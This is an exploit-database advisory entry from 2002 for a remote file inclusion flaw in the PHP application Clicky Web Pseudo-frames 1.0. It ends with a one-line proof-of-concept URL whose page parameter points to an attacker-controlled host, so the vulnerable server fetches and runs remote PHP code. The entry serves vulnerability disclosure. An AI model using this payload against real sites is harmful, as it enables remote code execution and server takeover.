Clicky Web Pseudo-frames 1.0 - Remote File Inclusion

EDB-ID:

21454

CVE:



Author:

frog

Type:

webapps


Platform:

PHP

Date:

2002-05-12


source: https://www.securityfocus.com/bid/4756/info

Pseudo-frames is an application written in PHP and is maintained by Clicky Web.

Pseudo-frames permit remote file including. As a result, a remote attacker may include an arbitrary file located on a remote host. If this file is a PHP script, it will be executed on the host running the vulnerable software.

http://www.site.com/index.php?page=http://www.haxor.com/file